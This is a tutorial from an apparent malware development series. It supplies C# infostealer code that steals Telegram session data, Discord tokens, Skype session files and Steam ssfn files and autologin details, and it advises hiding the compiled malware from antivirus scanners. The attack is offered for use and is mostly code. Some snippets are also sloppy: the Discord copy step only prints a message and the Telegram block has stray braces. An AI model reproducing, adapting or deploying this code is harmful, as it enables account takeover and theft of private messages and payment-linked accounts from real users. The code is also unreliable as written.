Lesson 10: Stealing Accounts Sessions with Malware
👾 Malware Development Series by XIT (C#)
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 10:
10. Accounts Session:
⇢ Telegram
⇢ Discord
⇢ Skype
⇢ Steam
more…
Accessing user accounts and sessions is a valuable goal for attackers seeking to steal sensitive data. In this lesson, we’ll demonstrate how to add functionality that can steal account sessions from popular services such as Telegram, Discord, Skype, Steam, and more.
Topic 1: Telegram Session
Telegram is a popular messaging app with more than 500 million active users. Using the below source-code you can write a function that is capable of stealing Telegram session data, giving you access to sensitive user data such as messages and contacts.
// telegram
private static string[] TelegramDirectories = new string[] {
"Telegram Desktop\\tdata\\D877F783D5D3EF8C",
"Telegram Desktop\\tdata\\D877F783D5D3EF8C\\map"
};
foreach (string directory in TelegramDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
foreach (string file in Directory.GetFiles(path))
{
if (Path.GetFileName(file) == "user.dat")
{
byte[] bytes = File.ReadAllBytes(file);
string content = Encoding.UTF8.GetString(bytes);
MatchCollection matches = Regex.Matches(content, @"(?:\W|^)(api_id|api_hash|app_version|device_model|system_version)\\":\\s\\"([^\\]+)");
if (matches.Count > 0)
{
string output = "";
foreach (Match match in matches)
{
output += match.Groups[1].Value + ": " + match.Groups[2].Value + "\n";
}
File.WriteAllText(sSavePath + "\\TelegramInfo.txt", output);
break;
}
}
}
}
}
// also add here function to copy the session directoryTopic 2: Discord Session
Discord is a popular communication app used by millions of gamers and other communities. Using the below source-code you can write a function that is capable of stealing Discord session data, allowing you to access sensitive user data such as messages, servers, and channels.
// discord
private static Regex TokenRegex = new Regex(@"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}");
private static string[] DiscordDirectories = new string[] {
"Discord\\Local Storage\\leveldb",
"Discord PTB\\Local Storage\\leveldb",
"Discord Canary\\Local Storage\\leveldb",
"Discord Development\\Local Storage\\leveldb",
};
public static void FetchDiscordTokens()
{
List<string> tokens = new List<string>();
foreach (string directory in DiscordDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
foreach (string file in Directory.GetFiles(path, "*.ldb"))
{
try
{
string contents = File.ReadAllText(file);
foreach (Match match in TokenRegex.Matches(contents))
{
if (!tokens.Contains(match.Value))
{
tokens.Add(match.Value);
}
}
}
catch (Exception ex)
{
Console.WriteLine($"Error reading Discord token from file {file}: {ex.Message}");
}
}
}
}
if (tokens.Count > 0)
{
try
{
string filePath = Path.Combine(Environment.CurrentDirectory, "discord_tokens.txt");
File.WriteAllLines(filePath, tokens);
Console.WriteLine($"Discord tokens written to {filePath}");
}
catch (Exception ex)
{
Console.WriteLine($"Error writing Discord tokens file: {ex.Message}");
}
}
else
{
Console.WriteLine("No Discord tokens found.");
}
try
{
foreach (string directory in DiscordDirectories)
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), directory);
if (Directory.Exists(path))
{
string destPath = Path.Combine(Environment.CurrentDirectory, directory.Replace('\\', '_') + ".zip");
Console.WriteLine($"Copied Discord session files to {destPath}");
}
}
}
catch (Exception ex)
{
Console.WriteLine($"Error copying Discord session files: {ex.Message}");
}
}Topic 3: Skype Session
Skype is a popular video and messaging app used by millions of people around the world. Using the below source-code you can write a function that is capable of stealing Skype session data, giving you access to sensitive user data such as messages, contacts, and call logs.
// skype
var skypeKey = Registry.CurrentUser.OpenSubKey("Software\\Skype\\Phone");
if (skypeKey == null)
return false;
var skypePath = skypeKey.GetValue("SkypePath")?.ToString();
if (!Directory.Exists(skypePath))
return false;
var sessionPath = Path.Combine(skypePath, "Sessions");
if (!Directory.Exists(sessionPath))
return false;
foreach (var file in Directory.GetFiles(sessionPath, "*.dbb"))
{
var fileName = Path.GetFileName(file);
var destinationPath = Path.Combine(Directory.GetCurrentDirectory(), fileName);
File.Copy(file, destinationPath, true);
}
File.WriteAllText("skype.txt", $"Skype installation path: {skypePath}");
return true;Topic 4: Steam Session
Steam is a popular gaming platform with more than 120 million active users. Using the below source-code you can write a function that is capable of stealing Steam session data, allowing you to access sensitive user data such as game libraries and payment information.
// steam
var steamKey = Registry.CurrentUser.OpenSubKey("Software\\Valve\\Steam");
if (steamKey == null)
return false;
var steamPath = steamKey.GetValue("SteamPath")?.ToString();
if (!Directory.Exists(steamPath))
return false;
var steamInfo = new StringBuilder();
foreach (var gameID in steamKey.OpenSubKey("Apps").GetSubKeyNames())
{
using (var appKey = steamKey.OpenSubKey($"Apps\\{gameID}"))
{
var name = appKey.GetValue("Name") as string ?? "Unknown";
var installed = (int)(appKey.GetValue("Installed") ?? 0) == 1 ? "Yes" : "No";
var running = (int)(appKey.GetValue("Running") ?? 0) == 1 ? "Yes" : "No";
var updating = (int)(appKey.GetValue("Updating") ?? 0) == 1 ? "Yes" : "No";
steamInfo.AppendLine($"Application {name}\n\tGameID: {gameID}\n\tInstalled: {installed}\n\tRunning: {running}\n\tUpdating: {updating}\n");
}
}
foreach (var file in Directory.GetFiles(steamPath ?? string.Empty))
{
if (Path.GetFileName(file)?.Contains("ssfn") == true)
File.Copy(file, $".\\{Path.GetFileName(file)}");
}
var rememberPassword = (int)(steamKey.GetValue("RememberPassword") ?? 0) == 1 ? "Yes" : "No";
steamInfo.AppendLine($"\nAutologin User: {steamKey.GetValue("AutoLoginUser")}\nRemember password: {rememberPassword}");
File.WriteAllText("steam.txt", steamInfo.ToString());Topic 5: More Account Sessions
Beyond Telegram, Discord, Skype, and Steam, there are many other popular services with valuable account sessions. Refering the above logics you can write custom functions for those which can can steal session data from other popular services, giving you access to even more sensitive user data.
Finally, I compiled all the topics of lesson 10 & it was detected by 2 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
For attackers looking to acquire sensitive user data, stealing account sessions is an useful aim. We learned how to create malware that can steal sessions from major sites like Telegram, Discord, Skype, Steam, and others in this class. With this information, you may create more powerful malware programmes and keep up with the most recent cybersecurity threats. Keep tuned for our next class, in which we’ll look at how to make your malware more advanced by adding file grabbing features.
